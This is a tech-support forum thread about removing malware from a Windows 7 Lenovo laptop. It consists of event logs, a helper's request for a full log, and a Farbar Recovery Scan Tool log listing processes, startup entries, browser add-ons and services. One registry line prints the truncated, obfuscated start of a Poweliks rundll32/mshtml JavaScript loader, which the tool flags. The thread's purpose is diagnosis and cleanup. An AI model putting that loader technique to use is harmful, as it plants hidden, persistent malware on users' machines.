Error: (10/18/2014 10:51:20 AM) (Source: Microsoft-Windows-LoadPerf) (EventID: 3011) (User: NT AUTHORITY)
Description: Unloading the performance counter strings for service WmiApRpl (WmiApRpl) failed. The first DWORD in the Data section contains the error code.

System errors:
=============
Error: (10/29/2014 00:16:09 PM) (Source: WMPNetworkSvc) (EventID: 14346) (User: )
Description: 0x80040154

Error: (10/29/2014 00:16:09 PM) (Source: WMPNetworkSvc) (EventID: 14346) (User: )
Description: 0x80040154

Error: (10/29/2014 00:16:01 PM) (Source: DCOM) (EventID: 10010) (User: )
Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

Error: (10/29/2014 00:14:30 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The regi service failed to start due to the following error:
%%2

Error: (10/29/2014 00:09:23 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The Diagnostic Policy Service service failed to start due to the following error:
%%1069

Error: (10/29/2014 00:09:23 PM) (Source: Service Control Manager) (EventID: 7038) (User: )
Description: The DPS service was unable to log on as NT AUTHORITY\LocalService with the currently configured password due to the following error:
%%50

To ensure that the service is configured properly, use the Services snap-in in Microsoft Management Console (MMC).

Error: (10/29/2014 00:09:23 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The Base Filtering Engine service failed to start due to the following error:
%%1069

Error: (10/29/2014 00:09:23 PM) (Source: Service Control Manager) (EventID: 7038) (User: )
Description: The BFE service was unable to log on as NT AUTHORITY\LocalService with the currently configured password due to the following error:
%%50

To ensure that the service is configured properly, use the Services snap-in in Microsoft Management Console (MMC).

Error: (10/29/2014 00:09:23 PM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: The Windows Firewall service depends on the Base Filtering Engine service which failed to start because of the following error:
%%1069

Error: (10/29/2014 00:09:23 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The Base Filtering Engine service failed to start due to the following error:
%%1069

Microsoft Office Sessions:
=========================
Error: (05/27/2011 10:48:56 AM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )
Description: ID: 3, Application Name: Microsoft Office PowerPoint, Application Version: 12.0.6545.5000, Microsoft Office Version: 12.0.6425.1000. This session lasted 6 seconds with 0 seconds of active time.  This session ended with a crash.

Error: (09/20/2010 11:05:12 PM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )
Description: ID: 0, Application Name: Microsoft Office Word, Application Version: 12.0.6541.5000, Microsoft Office Version: 12.0.6425.1000. This session lasted 6 seconds with 0 seconds of active time.  This session ended with a crash.

CodeIntegrity Errors:
===================================
  Date: 2014-10-29 11:44:06.791
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Program Files (x86)\AVG\AVG2015\avghooka.dll because the set of per-page image hashes could not be found on the system.

  Date: 2009-12-02 12:51:40.835
  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\swwork\DPIUP\TPDEVPE.SYS because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

  Date: 2009-12-02 12:51:40.835
  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\swwork\DPIUP\TPDEVPE.SYS because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

==================== Memory info ===========================

Processor: Intel® Core2 Duo CPU P8600 @ 2.40GHz
Percentage of memory in use: 51%
Total physical RAM: 2968.03 MB
Available physical RAM: 1444.92 MB
Total Pagefile: 5934.23 MB
Available Pagefile: 3459.91 MB
Total Virtual: 8192 MB
Available Virtual: 8191.82 MB

==================== Drives ================================

Drive c: (Windows7_OS) (Fixed) (Total:138.11 GB) (Free:12.91 GB) NTFS ==>[system with boot components (obtained from reading drive)]
Drive q: (Lenovo_Recovery) (Fixed) (Total:9.77 GB) (Free:2.27 GB) NTFS

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (Size: 149.1 GB) (Disk ID: 823B4BFF)
Partition 1: (Active) - (Size=1.2 GB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=138.1 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=9.8 GB) - (Type=07 NTFS)

==================== End Of Log ============================

Hello

P2P/Piracy Warning:

If you're using Peer 2 Peer software such as uTorrent, BitTorrent or similar you must either fully uninstall them or completely disable them from running while being assisted here. Failure to remove or disable such software will result in your topic being closed and no further assistance being provided. If you have illegal/cracked software, cracks, keygens etc. on the system, please remove or uninstall them now and read the policy on Piracy.

The first log, FRST.txt, is not complete; you only posted a partial log. Please post the full log; it will be here: C:\FRST\Logs

Thanks,

Kevin..


That's weird. I'll try again. Also, I've been getting "powershell" stopped responding errors as well. Also, FRST is constantly running. After completing and generating the log, it starts the scan again.

FRST LOG

Scan result of Farbar Recovery Scan Tool (FRST.txt) (x64) Version: 29-10-2014 01
Ran by Charles (administrator) on CHARLES-THINK on 29-10-2014 12:57:12
Running from C:\Users\Charles\Desktop
Loaded Profile: Charles (Available profiles: Charles)
Platform: Windows 7 Home Premium Service Pack 1 (X64) OS Language: English (United States)
Internet Explorer Version 10
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2015\avgrsa.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2015\avgcsrva.exe
() C:\Windows\System32\DTS.exe
(Lenovo.) C:\Windows\System32\ibmpmsvc.exe
(AuthenTec, Inc.) C:\Windows\System32\AtService.exe
(Microsoft Corporation) C:\Windows\System32\wlanext.exe
(Lenovo) C:\Program Files (x86)\Lenovo\Access Connections\AcPrfMgrSvc.exe
(Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2015\avgidsagent.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2015\avgwdsvc.exe
(Microsoft Corporation) C:\Program Files (x86)\Microsoft Small Business\Business Contact Manager\BcmSqlStartupSvc.exe
(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(Intel® Corporation) C:\Program Files\Intel\WiFi\bin\EvtEng.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2015\avgnsa.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2015\avgemca.exe
(Lenovo Group Limited) C:\Program Files\Lenovo\Communications Utility\CamMute.exe
(Lenovo Group Limited) C:\Program Files\Lenovo\Communications Utility\TPKNRSVC.exe
(Intel® Corporation) C:\Program Files\Common Files\Intel\WirelessCommon\RegSrvc.exe
(Microsoft Corporation) C:\Program Files (x86)\Microsoft\Search Enhancement Pack\SeaPort\SeaPort.exe
(Microsoft Corporation) C:\Program Files (x86)\Microsoft SQL Server\90\Shared\sqlbrowser.exe
(Lenovo Group Limited) C:\Program Files\Lenovo\HOTKEY\TPHKSVC.exe
(Viewpoint Corporation) C:\Program Files (x86)\Viewpoint\Common\ViewpointService.exe
(AVG Secure Search) C:\Program Files (x86)\Common Files\AVG Secure Search\vToolbarUpdater\18.1.10\ToolbarUpdater.exe
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
(Lenovo) C:\Program Files (x86)\Lenovo\Access Connections\AcSvc.exe
(Lenovo Group Limited) C:\Program Files\Lenovo\HOTKEY\tphkload.exe
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVCM.EXE
() C:\Program Files (x86)\Common Files\AVG Secure Search\vToolbarUpdater\18.1.10\loggingserver.exe
(Lenovo Group Limited) C:\Program Files\Lenovo\HOTKEY\TPOSDSVC.exe
(Lenovo Group Limited) C:\Program Files\Lenovo\HOTKEY\shtctky.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
(Lenovo Group Limited) C:\Program Files\Lenovo\ZOOM\TpScrex.exe
(Lenovo Group Limited) C:\Program Files\Lenovo\HOTKEY\TPONSCR.exe
(Microsoft Corporation) C:\Windows\System32\rundll32.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPHelper.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPLpr.exe
(Lenovo.) C:\Windows\System32\TpShocks.exe
(Lenovo Group Limited) C:\Program Files\Lenovo\Client Security Solution\cssauth.exe
(Intel Corporation) C:\Windows\System32\hkcmd.exe
(Intel Corporation) C:\Windows\System32\igfxpers.exe
(Lenovo Group Limited) C:\Program Files\Lenovo\Communications Utility\TpKnrres.exe
(Broadcom Corporation.) C:\Program Files\ThinkPad\Bluetooth Software\BTTray.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Viewpoint Corporation) C:\Program Files (x86)\Viewpoint\Viewpoint Manager\ViewMgr.exe
(Lenovo) C:\Program Files (x86)\Lenovo\Access Connections\SvcGuiHlpr.exe
(Microsoft Corporation) C:\Windows\SysWOW64\rundll32.exe
(Adobe Systems Inc.) C:\Program Files (x86)\Adobe\Acrobat 10.0\Acrobat\acrotray.exe
(Microsoft Corporation) C:\Windows\System32\rundll32.exe
(Lenovo Group Limited) C:\Program Files\Lenovo\Client Security Solution\password_manager.exe
(Apple Inc.) C:\Program Files (x86)\iTunes\iTunesHelper.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2015\avgui.exe
() C:\Program Files (x86)\AVG Web TuneUp\vprot.exe
(Lenovo Group Limited) C:\Program Files (x86)\ThinkPad\Utilities\SCHTASK.EXE
(Apple Inc.) C:\Program Files\iPod\bin\iPodService.exe
(Intel Corporation) C:\Windows\System32\igfxext.exe
(Intel Corporation) C:\Windows\System32\igfxsrvc.exe
(Lenovo Group Limited) C:\Program Files (x86)\Lenovo\Client Security Solution\password_manager.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Broadcom Corporation.) C:\Program Files\ThinkPad\Bluetooth Software\btwdins.exe
(Dropbox, Inc.) C:\Users\Charles\AppData\Roaming\Dropbox\bin\Dropbox.exe
(Microsoft Corporation) C:\Program Files (x86)\Microsoft Office\Office12\ONENOTEM.EXE
(InterVideo) C:\Program Files (x86)\Common Files\InterVideo\RegMgr\iviRegMgr.exe
(Intel Corporation) C:\Program Files (x86)\Intel\AMT\LMS.exe
(Microsoft Corporation) C:\Program Files\Microsoft SQL Server\90\Shared\sqlwriter.exe
(Lenovo) C:\Program Files (x86)\ThinkPad\Utilities\PWMDBSVC.exe
(Lenovo Group Limited) C:\Program Files (x86)\Common Files\Lenovo\tvt_reg_monitor_svc.exe
(Intel Corporation) C:\Program Files (x86)\Common Files\Intel\Privacy Icon\UNS\UNS.exe
(AVG Secure Search) C:\Program Files (x86)\AVG Web TuneUp\avgcefrend.exe
(Microsoft Corporation) C:\Program Files\Internet Explorer\iexplore.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\System32\MsSpellCheckingFacility.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe

==================== Registry (Whitelisted) ==================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [picon] => C:\Program Files (x86)\Common Files\Intel\Privacy Icon\PrivacyIconClient.exe [358424 2009-08-03] (Intel Corporation)
HKLM\...\Run: [TpShocks] => C:\Windows\system32\TpShocks.exe [380704 2009-07-08] (Lenovo.)
HKLM\...\Run: [FingerPrintSoftware] => C:\Program Files\Lenovo Fingerprint Software\fpapp.exe [1582328 2009-09-01] (AuthenTec)
HKLM\...\Run: [AcWin7Hlpr] => C:\Program Files (x86)\Lenovo\Access Connections\AcTBenabler.exe [63832 2014-03-14] (Lenovo)
HKLM\...\Run: [cssauth] => C:\Program Files\Lenovo\Client Security Solution\cssauth.exe [5990200 2011-06-10] (Lenovo Group Limited)
HKLM\...\Run: [LenVolFx] => C:\Windows\LenVolEx64.exe [15208 2009-11-02] (Lenovo)
HKLM\...\Run: [LENOVO.TPKNRRES] => C:\Program Files\Lenovo\Communications Utility\TPKNRRES.exe [60920 2013-05-29] (Lenovo Group Limited)
HKLM\...\Run: [smartAudio] => C:\Program Files\CONEXANT\SAII\SAIICpl.exe [307768 2009-11-19] ()
HKLM-x32\...\Run: [PWMTRV] => rundll32 "C:\Program Files (x86)\ThinkPad\Utilities\PWMTR64V.DLL",PwrMgrBkGndMonitor
HKLM-x32\...\Run: [GrooveMonitor] => C:\Program Files (x86)\Microsoft Office\Office12\GrooveMonitor.exe [30040 2009-02-26] (Microsoft Corporation)
HKLM-x32\...\Run: [WheelMouse] => C:\Advanced Wheel Mouse\wh_exec.exe [86016 2007-03-11] ()
HKLM-x32\...\Run: [APSDaemon] => C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe [43848 2014-02-06] (Apple Inc.)
HKLM-x32\...\Run: [] => [X]
HKLM-x32\...\Run: [Acrobat Assistant 8.0] => C:\Program Files (x86)\Adobe\Acrobat 10.0\Acrobat\Acrotray.exe [840592 2014-09-04] (Adobe Systems Inc.)
HKLM-x32\...\Run: [Adobe ARM] => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [959176 2014-08-21] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [Adobe Acrobat Speed Launcher] => C:\Program Files (x86)\Adobe\Acrobat 10.0\Acrobat\Acrobat_sl.exe [41360 2014-09-04] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [DivXMediaServer] => C:\Program Files (x86)\DivX\DivX Media Server\DivXMediaServer.exe [450560 2013-08-21] (DivX, LLC)
HKLM-x32\...\Run: [DivXUpdate] => C:\Program Files (x86)\DivX\DivX Update\DivXUpdate.exe [1861968 2013-08-28] ()
HKLM-x32\...\Run: [QuickTime Task] => C:\Program Files (x86)\QuickTime\QTTask.exe [421888 2014-01-17] (Apple Inc.)
HKLM-x32\...\Run: [iTunesHelper] => C:\Program Files (x86)\iTunes\iTunesHelper.exe [152392 2014-02-21] (Apple Inc.)
HKLM-x32\...\Run: [sunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [271744 2014-09-26] (Oracle Corporation)
HKLM-x32\...\Run: [AVG_UI] => C:\Program Files (x86)\AVG\AVG2015\avgui.exe [3649040 2014-10-16] (AVG Technologies CZ, s.r.o.)
HKLM-x32\...\Run: [vProt] => C:\Program Files (x86)\AVG Web TuneUp\vprot.exe [3037208 2014-10-29] ()
Winlogon\Notify\igfxcui: C:\Windows\system32\igfxdev.dll (Intel Corporation)
HKU\S-1-5-21-3094523011-22438472-3966868382-1003\...\Run: [Adobe Acrobat Synchronizer] => C:\Program Files (x86)\Adobe\Acrobat 10.0\Acrobat\AdobeCollabSync.exe [1104288 2014-09-04] (Adobe Systems Incorporated)
HKU\S-1-5-21-3094523011-22438472-3966868382-1003\...\Run: [ROC_ROC_APR2013_AV] => C:\Users\Charles\AppData\Roaming\AVG April 2013 Campaign\AVG-Secure-Search-Update.exe /PROMPT --mid 1fd7f8e2d15802a9a91c4e3ce4a00c4e-7ee74b05d6d362cf5e6b3a8d6b5b082e5cfa3b2d --CMPID ROC_APR2013_AV
HKU\S-1-5-21-3094523011-22438472-3966868382-1003\...\Run: [AVG-Secure-Search-Update_0913a] => C:\Users\Charles\AppData\Roaming\AVG 0913a Campaign\AVG-Secure-Search-Update-0913a.exe /PROMPT --mid 1fd7f8e2d15802a9a91c4e3ce4a00c4e-7ee74b05d6d362cf5e6b3a8d6b5b082e5cfa3b2d --CMPID 0913a
HKU\S-1-5-21-3094523011-22438472-3966868382-1003\...\MountPoints2: {f397cc25-9f37-11e0-9bf5-00226819c704} - D:\LaunchU3.exe
HKU\S-1-5-21-3094523011-22438472-3966868382-1003\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks!
Lsa: [Notification Packages] scecli ACGina
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Bluetooth.lnk
ShortcutTarget: Bluetooth.lnk -> C:\Program Files\ThinkPad\Bluetooth Software\BTTray.exe (Broadcom Corporation.)
Startup: C:\Users\Charles\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dropbox.lnk
ShortcutTarget: Dropbox.lnk -> C:\Users\Charles\AppData\Roaming\Dropbox\bin\Dropbox.exe (Dropbox, Inc.)
Startup: C:\Users\Charles\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OneNote 2007 Screen Clipper and Launcher.lnk
ShortcutTarget: OneNote 2007 Screen Clipper and Launcher.lnk -> C:\Program Files (x86)\Microsoft Office\Office12\ONENOTEM.EXE (Microsoft Corporation)

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

HKCU\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://lenovo.msn.com
HKCU\Software\Microsoft\Internet Explorer\Main,Default_Secondary_Page_URL = http://www.lenovo.com/welcome/thinkpad
SearchScopes: HKLM - {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKLM-x32 - {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKCU - DefaultScope {7ABD5EFD-88A6-E9CE-80AE-DBCA8C52F41C} URL = http://www.bing.com/search?q={searchTerms}&pc=Z134&form=ZGAIDF&install_date=20110828&iesrc={referrer:source}
SearchScopes: HKCU - VWPT URL = http://search.viewpoint.com/pl/search?tab=1&k={searchTerms}&addr=1&query=vb=1%26tn%3D0%26addr%3D1%26type%3Drel39%5fvista%26instid%3DViewpointV39%5fvista
SearchScopes: HKCU - {7ABD5EFD-88A6-E9CE-80AE-DBCA8C52F41C} URL = http://www.bing.com/search?q={searchTerms}&pc=Z134&form=ZGAIDF&install_date=20110828&iesrc={referrer:source}
SearchScopes: HKCU - {95B7759C-8C7F-4BF1-B163-73684A933233} URL = https://mysearch.avg.com/search?cid={CF064197-EF34-483D-9875-B1E2E5BC5836}&mid=1fd7f8e2d15802a9a91c4e3ce4a00c4e-7ee74b05d6d362cf5e6b3a8d6b5b082e5cfa3b2d&lang=en&ds=AVG&coid=avgtbavg&cmpid=&pr=fr&d=2014-10-29 11:52:56&v=4.0.0.17&pid=wtu&sg=&sap=dsp&q={searchTerms}
SearchScopes: HKCU - {D552A914-C4D7-44A7-89F3-51389FAACF75} URL =
BHO: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corp.)
BHO: Java Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files\Java\jre6\bin\jp2ssv.dll No File
BHO-x32: Search Helper -> {6EBF7485-159F-4bff-A14F-B9E3AAC4465B} -> C:\Program Files (x86)\Microsoft\Search Enhancement Pack\Search Helper\SEPsearchhelperie.dll (Microsoft Corporation)
BHO-x32: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files (x86)\Microsoft Office\Office12\GrooveShellExtensions.dll (Microsoft Corporation)
BHO-x32: Java Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre7\bin\ssv.dll (Oracle Corporation)
BHO-x32: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corp.)
BHO-x32: AVG Web TuneUp -> {95B7759C-8C7F-4BF1-B163-73684A933233} -> C:\Program Files (x86)\AVG Web TuneUp\4.0.0.17\AVG Web TuneUp.dll (AVG)
BHO-x32: Viewpoint Toolbar BHO -> {A7327C09-B521-4EDB-8509-7D2660C9EC98} -> C:\Program Files (x86)\Viewpoint\Viewpoint Toolbar\3.9.0\ViewBarBHO.dll (Viewpoint Corporation)
BHO-x32: CrossRider -> {A876E312-7D08-401a-B7A6-FAFC5DC2F292} -> C:\Program Files (x86)\CrossriderWebApps\Crossrider.dll ()
BHO-x32: Adobe PDF Conversion Toolbar Helper -> {AE7CD045-E861-484f-8273-0445EE161910} -> C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll (Adobe Systems Incorporated)
BHO-x32: IePasswordManagerHelper Class -> {BF468356-BB7E-42D7-9F15-4F3B9BCFCED2} -> C:\Program Files (x86)\Lenovo\Client Security Solution\tvtpwm_ie_com.dll (Lenovo Group Limited)
BHO-x32: Java Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre7\bin\jp2ssv.dll (Oracle Corporation)
BHO-x32: SmartSelect Class -> {F4971EE7-DAA0-4053-9964-665D8EE6A077} -> C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll (Adobe Systems Incorporated)
Toolbar: HKLM-x32 - Viewpoint Toolbar - {F8AD5AA5-D966-4667-9DAF-2561D68B2012} - C:\Program Files (x86)\Common Files\Viewpoint\Toolbar Runtime\3.9.0\IEViewBar.dll (Viewpoint Corporation)
Toolbar: HKLM-x32 - Adobe PDF - {47833539-D0C5-4125-9FA8-0819E2EAAC93} - C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll (Adobe Systems Incorporated)
Toolbar: HKCU - No Name - {21FA44EF-376D-4D53-9B0F-8A89D3229068} -  No File
Toolbar: HKCU - No Name - {47833539-D0C5-4125-9FA8-0819E2EAAC93} -  No File
DPF: HKLM-x32 {2DAD3559-2923-4935-AD49-B673D2539944} http://www-307.ibm.com/pc/support/acpir.cab
DPF: HKLM-x32 {82E5DF24-51E8-47CD-864A-F4BD5005AA73} https://www.icloud.com/system/iCloud.cab
DPF: HKLM-x32 {9E472D58-F10C-11CF-B7A9-0020AFD6A362} https://vault.netvoyage.com/neWeb2/neWebCl.cab
DPF: HKLM-x32 {9E472D6A-F10C-11CF-B7A9-0020AFD6A362} https://vault.netvoyage.com/neWeb2/neCrypto.cab
DPF: HKLM-x32 {CC679CB8-DC4B-458B-B817-D447B3B6AC31} https://vpn01.bcm.edu/CACHE/stc/1/binaries/vpnweb.cab
Handler-x32: viprotocol - {B658800C-F66E-4EF3-AB85-6C0C227862A9} - C:\Program Files (x86)\Common Files\AVG Secure Search\ViProtocolInstaller\18.1.10\ViProtocol.dll (AVG Secure Search)
Tcpip\Parameters: [DhcpNameServer] 192.168.1.1

FireFox:
========
FF ProfilePath: C:\Users\Charles\AppData\Roaming\Mozilla\Firefox\Profiles\4orzi33e.default
FF DefaultSearchEngine: AVG Secure Search
FF SelectedSearchEngine: AVG Secure Search
FF Homepage: https://mysearch.avg.com?cid={CF064197-EF34-483D-9875-B1E2E5BC5836}&mid=1fd7f8e2d15802a9a91c4e3ce4a00c4e-7ee74b05d6d362cf5e6b3a8d6b5b082e5cfa3b2d&lang=en&ds=AVG&coid=avgtbavg&cmpid=&pr=fr&d=2014-10-29 11:52:56&v=4.0.0.17&pid=wtu&sg=&sap=hp
FF Plugin: @divx.com/DivX VOD Helper,version=1.0.0 -> C:\Program Files\DivX\DivX OVS Helper\npovshelper.dll (DivX, LLC.)
FF Plugin: @microsoft.com/GENUINE -> disabled No File
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.30514.0\npctrl.dll ( Microsoft Corporation)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF32.dll No File
FF Plugin-x32: @Apple.com/iTunes,version=1.0 -> C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll ()
FF Plugin-x32: @avg.com/AVG SiteSafety plugin,version=11.0.0.1,application/x-avg-sitesafety-plugin -> C:\Program Files (x86)\Common Files\AVG Secure Search\SiteSafetyInstaller\18.1.10\\npsitesafety.dll No File
FF Plugin-x32: @divx.com/DivX VOD Helper,version=1.0.0 -> C:\Program Files (x86)\DivX\DivX OVS Helper\npovshelper.dll (DivX, LLC.)
FF Plugin-x32: @divx.com/DivX Web Player Plug-In,version=1.0.0 -> C:\Program Files (x86)\DivX\DivX Web Player\npdivx32.dll (DivX, LLC)
FF Plugin-x32: @google.com/npPicasa3,version=3.0.0 -> C:\Program Files (x86)\Google\Picasa3\npPicasa3.dll (Google, Inc.)
FF Plugin-x32: @java.com/DTPlugin,version=10.71.2 -> C:\Program Files (x86)\Java\jre7\bin\dtplugin\npDeployJava1.dll (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=10.71.2 -> C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll (Oracle Corporation)
FF Plugin-x32: @microsoft.com/GENUINE -> disabled No File
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\5.1.30514.0\npctrl.dll ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/OfficeLive,version=1.5 -> C:\Program Files (x86)\Microsoft\Office Live\npOLW.dll (Microsoft Corp.)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3502.0922 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3508.1109 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.25.5\npGoogleUpdate3.dll (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.25.5\npGoogleUpdate3.dll (Google Inc.)
FF Plugin-x32: Adobe Acrobat -> C:\Program Files (x86)\Adobe\Acrobat 10.0\Acrobat\Air\nppdf32.dll (Adobe Systems Inc.)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\nppdf32.dll (Adobe Systems Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npqtplugin.dll (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npqtplugin2.dll (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npqtplugin3.dll (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npqtplugin4.dll (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npqtplugin5.dll (Apple Inc.)
FF SearchPlugin: C:\Users\Charles\AppData\Roaming\Mozilla\Firefox\Profiles\4orzi33e.default\searchplugins\avg-secure-search.xml
FF SearchPlugin: C:\Program Files (x86)\mozilla firefox\browser\searchplugins\wtu-secure-search.xml
FF Extension: AVG Web TuneUp - C:\Users\Charles\AppData\Roaming\Mozilla\Firefox\Profiles\4orzi33e.default\Extensions\avg@toolbar [2014-10-29]
FF HKLM-x32\...\Firefox\Extensions: [web2pdfextension@web2pdf.adobedotcom] - C:\Program Files (x86)\Adobe\Acrobat 10.0\Acrobat\Browser\WCFirefoxExtn
FF Extension: Adobe Acrobat - Create PDF - C:\Program Files (x86)\Adobe\Acrobat 10.0\Acrobat\Browser\WCFirefoxExtn [2012-03-16]
FF HKCU\...\Firefox\Extensions: [{F74D5734-46F5-4B16-96F0-1E7FBF41B750}] - C:\Program Files (x86)\Lenovo\Client Security Solution\PWM Firefox Extension\2.0b12
FF Extension: ThinkVantage Password Manager - C:\Program Files (x86)\Lenovo\Client Security Solution\PWM Firefox Extension\2.0b12 [2013-11-21]

Chrome:
=======
CHR HKLM-x32\...\Chrome\Extension: [jpnbdefcbnoefmmcpelplabbkfmfhlho] - C:\ProgramData\CodecCheck\chrome\codec_check.crx [2011-08-28]

==================== Services (Whitelisted) =================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

S3 ADMonitor; C:\Windows\system32\ADMonitor.exe [130048 2009-09-01] () [File not signed]
R2 ATService; C:\Windows\system32\AtService.exe [2498296 2009-09-01] (AuthenTec, Inc.)
R2 AVGIDSAgent; C:\Program Files (x86)\AVG\AVG2015\avgidsagent.exe [3487248 2014-10-16] (AVG Technologies CZ, s.r.o.)
R2 avgwd; C:\Program Files (x86)\AVG\AVG2015\avgwdsvc.exe [298080 2014-10-16] (AVG Technologies CZ, s.r.o.)
S3 DozeSvc; C:\Program Files (x86)\ThinkPad\Utilities\DZSVC64.EXE [319536 2014-09-10] (Lenovo.)
R2 dtsvc; C:\Windows\system32\DTS.exe [117760 2009-09-01] () [File not signed]
S3 IDriverT; C:\Program Files (x86)\Common Files\InstallShield\Driver\1050\Intel 32\IDriverT.exe [73728 2004-10-22] (Macrovision Corporation) [File not signed]
